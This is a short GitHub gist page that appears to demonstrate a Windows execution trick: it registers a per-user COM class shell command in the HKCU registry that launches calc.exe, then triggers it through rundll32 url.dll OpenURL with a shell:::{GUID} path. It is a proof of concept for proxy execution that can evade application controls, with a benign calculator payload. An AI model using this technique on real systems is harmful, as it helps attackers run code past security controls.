Skip to content

Instantly share code, notes, and snippets.

@Moriarty2016
Created May 28, 2018 11:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Moriarty2016/fdc0d35baba11416dfa8aadd88859d53 to your computer and use it in GitHub Desktop.
Save Moriarty2016/fdc0d35baba11416dfa8aadd88859d53 to your computer and use it in GitHub Desktop.
1. powershell -ep -C [guid]::NewGuid().Guid
Use this command to generate a new {GUID}
2.reg add HKCU\Software\Classes\CLSID\{GUID}\Shell\Manage\command /ve /t REG_SZ /d "calc.exe"
Simply add a reg entry.
3.rundll32 url.dll, OpenURL shell:::{GUID}
Magic reveals:-)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment